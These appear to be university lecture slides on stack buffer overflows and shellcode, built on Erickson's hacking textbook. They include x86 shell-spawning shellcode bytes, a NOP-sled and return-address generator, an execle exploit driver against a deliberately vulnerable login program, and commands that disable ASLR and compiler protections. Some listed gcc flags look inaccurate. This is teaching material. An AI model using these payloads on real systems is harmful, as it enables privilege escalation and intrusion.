Shellcode Georgia Tech ECE6612 Computer Network Security Reviewed by John Copeland 3/30/14 Reference: "Hacking: the Art of Exploitation," Jon Erickson, 2nd ed., ISBN-13: 978-1-59327-144-2



A computer is exploited ("hacked") if an unauthorized person gains access to the computer's data and computing resources.

This can be done by:

1. discovering a valid username and password (e.g., guessing or social engineering),

2. injecting crafted data into a vulnerable program to make it do things it should not do (e.g., SQL injection to extract private data, or causing a "buffer overflow" to alter data),

3. injecting "shell code" into the computer memory, and then getting the computer to execute that code.

These slides will demo and discuss the second and third techniques:

1. What is "shellcode"?

2. How can it be injected?

3. How can it be run?

These slides will build up a foundation for further study using the book "Hacking, the Art of Exploitation," ed.2, by Jon Erickson*. Once techniques are known, defenses are incorporated. The hacker community then develops new techniques, and the cycle repeats.

The book discusses the technological basis for past exploits, and details several cycles of hackers versus operating system developers. Neither the book nor these slides show specific techniques that can be used against current, updated operating systems. The book does show how to construct a program for testing another program's susceptibility to buffer overflows, illustrating how hackers continually find new vulnerabilities.

"Honey Pots" are computers set up to attract attacks so that the newest exploit code can be studied. The best code today uses sophisticated encryption and obfuscation techniques to prevent disassembly. Observing the network activity of an infected computer often does provide valuable information, especially if the covert channel techniques being used can be discovered.

*www.nostarchpress.com

Vulnerabilities Fixed in Two Versions of SeaMonkey Browser (Firefox with Editing)

Fixed in SeaMonkey 2.0.12
MFSA 2011-10 CSRF risk with plugins and 307 redirects
MFSA 2011-08 ParanoidFragmentSink allows javascript: URLs in chrome docs
MFSA 2011-07 Memory corruption during text run construction (Windows)
MFSA 2011-06 Use-after-free error using Web Workers
MFSA 2011-05 Buffer overflow in JavaScript atom map
MFSA 2011-04 Buffer overflow in JavaScript upvarMap
MFSA 2011-03 Use-after-free error in JSON.stringify
MFSA 2011-02 Recursive eval call causes confirm dialogs to evaluate to true
MFSA 2011-01 Miscellaneous memory safety hazards (rv:1.9.2.14/ 1.9.1.17)

Fixed in SeaMonkey 2.0.11
MFSA 2010-84 XSS hazard in multiple character encodings
MFSA 2010-83 Location bar SSL spoofing using network error page
MFSA 2010-82 Incomplete fix for CVE-2010-0179 [see http://cve.mitre.org/cve/]
MFSA 2010-81 Integer overflow vulnerability in NewIdArray
MFSA 2010-80 Use-after-free error with nsDOMAttribute MutationObserver
MFSA 2010-79 Java security bypass from LiveConnect loaded via data: URL refresh
MFSA 2010-78 Add support for OTS font sanitizer
MFSA 2010-77 Crash and remote code execution using HTML tags inside a XUL tree
MFSA 2010-76 Chrome privilege escalation with window.open and <isindex> element
MFSA 2010-75 Buffer overflow while line breaking after document.write with long string
MFSA 2010-74 Miscellaneous memory safety hazards (rv:1.9.2.13/ 1.9.1.16)

The C Programming Language
by Brian W. Kernighan and Dennis M. Ritchie*

Developed along with UNIX in the early 1970s at Bell Labs, Murray Hill, NJ

*Prentice Hall; ed 2 (1988), ISBN-10: 0131103628, ISBN-13: 978-0131103627, $48
Handy reference: http://www.acm.uiuc.edu/webmonkeys/book/c_guide/ (dated 1997)

#include <time.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/stat.h>

char progid[80] = "square_it.c by John Copeland 4/1/2011" ;

int do_square( int x )   // "x" here is a local variable, stored in a different
{                        // location (on the stack) from the "x" in main
    x = x * x ;
    return( x ) ;
}

int main(int argc, char * argv[ ])
{
    int x, y ;           // modern: replace "int" with "int32_t"
    char buf[100] ;
    printf("\n%s\n", progid ) ;
    while(1) {
        printf("\n Type number (q = quit) : ") ;
        gets( buf ) ;    // no length limit: the linker warning below refers to this call
        if( buf[0] == 'q' ) break ;
        x = atoi( buf ) ;
        y = do_square( x ) ;
        printf(" The square of %d is %d\n", x, y );
    }
    return( 0 ) ;
}


$ gcc -Wall -o square_it square_it.c

$ ./square_it

square_it.c by John Copeland 4/1/2011

warning: this program uses gets(), which is unsafe.
 Type number (q = quit) : 2
 The square of 2 is 4

 Type number (q = quit) : 3
 The square of 3 is 9

 Type number (q = quit) : q
$

Integer and Character Declarations

Old-Style Length in Bits, by CPU Type

Variable Type      DEC PDP-11   Honeywell 6000   IBM 370   Interdata 8/32   32-bit Intel PC, IA32
char               8            9                8         8                8
short int          16           36               16        16               16
int                16           36               32        32               32
long int           32           36               32        32               32
long long int      32           36               32        32               64
float (double/2)   64           36               32        64               32

// modern style: "int x ;" can be replaced by "int32_t x ;"
#include <stdint.h>

int32_t x ;
uint8_t c ;

C without memory pointers is no C at all

int64_t X, *P, A[10] ; // int64_t replaces "long long"

char S[100] ; // string up to 99 chars, S[99] must = 0 (null)

The name and type are kept in the symbol table; the allocated memory is in the executable program.

Name   Type of Variable                      Memory Allocated (bytes)
X      8-byte integer                        200-207, is the value of X
P      4-byte pointer to 8-byte integer      210-213, for memory-address
A      4-byte pointer to 8-byte integer      20-99, for 10 8-byte integers
S      4-byte pointer to 1-byte character    100-199, for 100 1-byte characters (integers)

Equivalents:
X and *( &X )
S[10] and *(S+10)
after P = &X : X and *P and P[0] and *(P + 0)

"&" means "address of _", "*" means "value pointed to by _"

How Programs Are Stored in Memory, and How Subroutine Arguments Are Put on the Stack

Erickson pp. 69-75

Process Memory, from lowest address to highest address:

Text or Code Segment
Data Segment
BSS Segment (data)
Heap Segment (grows toward higher addresses)
Stack Segment (grows toward lower addresses)

Stack Frame (created by a subroutine or function call):

Return-Value Pointer
Local Variables (e.g.): char buffer[10], int flag
Saved Frame Pointer
Return Instruction Ptr †
Subroutine Input Arguments (passed by value)

† An attacker modifies this address to point at shell code; the function's return then sets the program counter to that address.

Subroutine Calls

Text (Code) Segment:

main( )
10000 -> y = do_square( x )
10008 -> printf( … )

do_square( )
40000 -> x = x * x
40008 -> return( x )

Data or BSS Segment:

x: 2
y: _ -> 4

Stack Frame (on the Stack):

PC return: 10008
Input Argument 2
Saved Frame Pointer
Return Value Ptr
Argument x: 2 -> 4
Buffer, flags

Program Counter (PC or EIP): points at the instruction being executed in the text segment.

A subroutine call adds memory locations to the top of the stack, to hold all the local variables and the return value for the Program Counter (and Stack Pointer).

Strings in C

A string is an array of characters, terminated by a null byte ('\0').

C does not store the length, or maximum length, of a string.

Frequent coding error: forgetting that S, declared below as char S[10], can only hold 9 characters plus the terminating null.

Memory: 0000000000apredefined0yes0no00?000PPPP //each char is a byte

Program Line: printf("Results: %c.%s.\n", c, T ) ;

Results: a.predefined.

Program Line: gets( S ) ; //input from keyboard, note S is a char ptr

User types: "abcdefghijI GOT YOU !" // > 10 characters

Memory: abcdefghijI GOT YOU !0yes0no00?000PPPP //each char is a byte

Program Line: printf("Results: %c.%s.\n", c, T ) ;

Results: I. GOT YOU !.

Cure: fgets( S, 10, stdin ) ; // stores at most 9 characters plus the terminating null

Declarations for the memory example above:

char S[10], c='a', T[ ]="predefined", A[3][4]={"yes","no","?"}, *P;

We can see that a buffer overflow will mess up data, but how do we 1) put executable code in a string, and 2) execute it?

Erickson pp. 5-114

Stack Buffer-Overflow

Erickson p. 122

// authenticate_me.c should grant access to only "john" or "cope"
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

int check_auth( char *password ) {
    char pw_buffer[16] ;
    int auth_flag = 0 ;
    strcpy( pw_buffer, password ) ;            // string copy, no length check (the vulnerability)
    if( strcmp( pw_buffer, "john" ) == 0 )     // string compare
        auth_flag = 1 ;
    if( strcmp( pw_buffer, "cope" ) == 0 )     // string compare
        auth_flag = 1 ;
    return( auth_flag ) ;
}

int main( int argc, char * argv[ ] ) {
    if( argc < 2 ) return( 1 ) ;               // no password given
    if( check_auth( argv[ 1 ] ) )              // if return value != 0
        printf(" ### Access Granted ### ") ;   // for "john" or "cope"
    else
        printf(" ### Access Denied ### ") ;    // anything else
    return( 0 ) ;
}

Testing "Authenticate_Me"

$ ./authenticate_me john
 ### Access Granted ###

$ ./authenticate_me cope
 ### Access Granted ###

$ ./authenticate_me nobody
 ### Access Denied ###

Overwriting "auth_flag":

$ ./authenticate_me xxxxxxxxxxxxxxxx
 ### Access Granted ###

Overwriting the PC return value in the preceding stack frame (one long argument, wrapped here):

$ ./authenticate_me xxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Segmentation fault
$

Fuzzers

Hackers use programs that automatically try all lengths of input to find a length that does what they want.

A "Fuzzer" is a program that generates quasi-random data input to a program to test for unanticipated problems.

For example, putting increasingly long command line arguments into "Authenticate-Me" would show a range of lengths that worked to get authenticated, and a range that produced segmentation faults.

Black-box Fuzzer – produces random input data.

White-box Fuzzer – uses algorithms to increase the code-coverage for testing known code.

Shellcode

"Shellcode" is binary code that will execute without being processed by a "Loader".

1. Must make kernel system calls directly (no standard libraries)
2. Must use absolute or relative jumps (no relocatable jumps)
3. Must be written using assembly language, and with a limited set of commands (e.g., no labels).

Development can be helped by looking at assembly code generated by the C compiler, using the gdb debugger.

The original shell code (shown later) starts a shell (e.g., /bin/sh) running so that a command prompt is available. If the vulnerable program is a SUID-root program (e.g., passwd), then the shell user is "root." Now "shell code" has come to include any similar code with other functions (e.g., installing a back door).

Erickson pp. 281-318

Hooking Code

Text (Code) Segment:

main( )
10000 -> y = do_square( x )
10008 -> printf( … )

do_square( )
40000 -> x = x * x
40008 -> return( x )

Shellcode:

80000 -> starting instruction
         more instructions
         jump 10008

Stack:

PC return: 80000
Input Argument 2
Saved Frame Pointer

Program Counter (PC or EIP)

Exploit code that installs shellcode must:
Get the PC return value from the stack for the final "jump" instruction (or let it crash later).
Know where the shellcode has been written in memory, to reset the PC return.
The shellcode can reset the stack based on the current SP and SFP values.

Putting Binary Shellcode into a String, on Command Line

Stack before the overflow:

Return Value: 4
Argument x: 2 -> 4
buffer (unused)   <- SP
Later PC Return
Previous Stack Frame

Data overflow to inject a new "PC Return":

Sled of NOPs
Shellcode
Repeated Address (hopefully -> sled)

// type_shellcode.c
// compile: gcc type_shellcode.c -o type_shellcode
// Writes to stdout a (4 x argv[1])-byte sled, the shellcode, and then argv[2]
// copies of the start address given by the bytes argv[3-6]:
//   ./type_shellcode 10 20 191 255 248 92
// gives a 40-byte sled, the shellcode, and 20 times 0xbffff85c *
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>

char shellcode[ ] =
"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80"
"\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89"
"\xe3\x51\x89\xe2\x53\x89\xe1\xcd\x80"; // 35 bytes + '\x00'

int main(int argc, char * argv[ ]) {
    int i, n ;
    char c[4] ;
    if( argc < 7 ) return( 1 ) ;                 // all six arguments are required
    n = 4 * atoi( argv[ 1 ] ) ;                  // argv[1] = 10, so n = 40
    for(i = 0; i < n ; i++)
        printf("%c",'\x90');                     // build sled of NOPs (4 x 10)
    printf("%s", shellcode ) ;                   // print shellcode
    c[0]=atoi(argv[3]); c[1]=atoi(argv[4]);      // 191 255 = hex bf ff
    c[2]=atoi(argv[5]); c[3]=atoi(argv[6]);      // 248 92 = hex f8 5c
    n = atoi( argv[ 2 ] ) ;                      // n = 20
    for(i = 0; i < n ; i++)
        printf("%c%c%c%c", c[0],c[1],c[2],c[3]); // build block of 20 start (return) addresses
    return( 0 ) ;
}

Usage: > ./authenticate_me $(./type_shellcode 10 20 191 255 248 92)
// To run, you must use gdb to find the right value of the starting address.
// The bash shell expands $( ./x ) to the output of program ./x
// * This is for a G4 CPU. For an Intel CPU, reverse the order of the address-byte integers.

Address space layout randomization (ASLR)

To see where pw_buffer is stored, add a line:

printf(" ======= &pw_buffer = %x = %u\n", (unsigned int) &pw_buffer, (unsigned int) &pw_buffer ) ;

and comment out the other printf() lines (commas added to the decimal values for readability):

$ ./authenticate_me john
======= &pw_buffer = bfe27540 = 3,219,289,408

$ ./authenticate_me john
======= &pw_buffer = bfecb010 = 3,219,959,824

$ ./authenticate_me john
======= &pw_buffer = bfe35480 = 3,219,346,560

$ ./authenticate_me john
======= &pw_buffer = bfe7b720 = 3,219,633,952

$ ./authenticate_me john
======= &pw_buffer = bff71840 = 3,220,641,856

$ ./authenticate_me john
======= &pw_buffer = bff96ad0 = 3,220,794,064

$ ./authenticate_me john
======= &pw_buffer = bffeaab0 = 3,221,138,096

Stack overflow injection is now difficult because the address of the stack frame varies over a range of about 2,000,000 bytes each time the modified program is run.

It only needs to work once. By automatically trying up to a million times, a single hit is probable, and that can install a back door to root. (see pp. 384-391)

// execle_run.c
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <stdint.h>

int main(int argc, char *argv[ ]) {
    char *env[2] = {"\x31\xc0\x31 … \xcd\x80", NULL}; // last entry must be NULL
    uint32_t i, ret = 0xbffffffa; // address of env[0] in "authenticate_me"
    char buffer[161] ;

    for(i=0;i<160;i+=4)
        *( (uint32_t*) (buffer+i) ) = ret ; // put in 4-byte address
    buffer[160] = 0 ;
    execle("./authenticate_me", "authenticate_me", buffer, NULL, env );
    return( 0 ) ;
}

Run a program with execle() to limit the environment. Put the shellcode into the only environment string, env[0]. The overflow string (buffer) only has to have the starting address (ret), repeated many times.*

* Erickson pp. 149-150
** With today's (2011) Linux, "ret" has to match a different value on each run, even when execle() is used.

Buffer overflows can be used to:

Alter data later used in control statements.
Basic problem: Input data and control data on stack.

Inject shellcode and cause it to be executed.
Basic problem: Input data and Program-Counter return values are kept on the stack. PC can point to a stack address.

Other types of overflows:
Stack segment overflow (p. 150)
Function pointer overflow (p. 156)
Printf format strings (p. 171)
    Examine stack values
    Read arbitrary values from memory
    Write arbitrary values to memory

Present-day C compilers (gcc) and Linux are designed to defeat most of the techniques discussed in "Hacking, the Art of Exploitation".

For those of you who would like to experiment with code that has vulnerabilities, you can turn some of these protections off in the OS, and in the gcc compiler:

*** To disable ASLR (Address Space Layout Randomization): this change is immediate on the running OS kernel (run with root privileges).

echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

("sudo echo 0 > /proc/sys/kernel/randomize_va_space" fails for a non-root user, because the shell performs the redirection before sudo runs.)

(when done: echo 1 | sudo tee /proc/sys/kernel/randomize_va_space, or write back whatever value the file held before, which is 2 on many current distributions)

*** To turn off gcc protections when you compile your program, use options

-fno-stack-protector       this will disable canaries
-fno-stack-protector-all
-fno-address-sanitizer     turn off AddressSanitizer, a memory error detector
-fno-memsafety
-z execstack               this will make the stack executable (disables non-executable stack protection)
-fno-mudflap               this will disable protections for risky pointer operations that may be used in overflows, so runtime memory access errors are not caught

Not every option is accepted by every compiler version (for example, mudflap was removed in GCC 4.9); drop any option your compiler rejects.

Example gcc compile:

 > gcc -g -fno-stack-protector -z execstack -Wall -o program program.c

-Wall shows all warnings, always good to have,

-g so you can use gdb to show C code lines and variable locations.

Information provided by Dr. Selcuk Uluagac, GT ECE (now at Fla. International U.)


Networking, Chapter 4

Concise explanation of sockets, protocol stack, formats, …

Simple code for:
Server program (p.204)
Web Server program (p.213)
Network traffic sniffing (p.224)
Source code for Nemesis (arp spoofing, p.245)
SYN flood, Ping of Death, Ping Flood, …
TCP/IP hijacking (p.258)
Port scanning (p.264)
Pro-active defense (p.267)
Port-binding shellcode (p.278)

Shellcode, Chapter 5

Using ASM to write assembly code (p.281)

Linux system calls (p.283)

Investigating with gdb (p.289)

Removing null bytes (p.290)

Shell-spawning shellcode (the original, p.295)

Port-binding shellcode (for backdoors, p.303)

Connect-back shellcode (defeat firewalls, p.314)


Counter Measures, Chapter 6

Counter measures that detect intrusion (p.320)

Log files (p.334)

Rootkit techniques (p.348)

Socket reuse (p.355)

Payload smuggling (hiding signatures, p.359)

Polymorphic Printable ASCII shellcode (p.366)

Non-executable stack (available, not used, p.376)

Randomized stack space (seen earlier, p.379)

Defeating above (p.388)


Cryptology, Chapter 7

Basics (p.393)

Symmetric encryption (p.398)

Asymmetric encryption (p.400)

Hybrid Ciphers (man-in-the-middle attacks, p.406)

SSH attacks

Password Cracking (p.418)

Dictionary attacks, Rainbow Tables

Wireless 802.11b WiFi encryption (p.436)

WPA attacks - not covered

Conclusion, Chapter 8 (pp. 452-453)
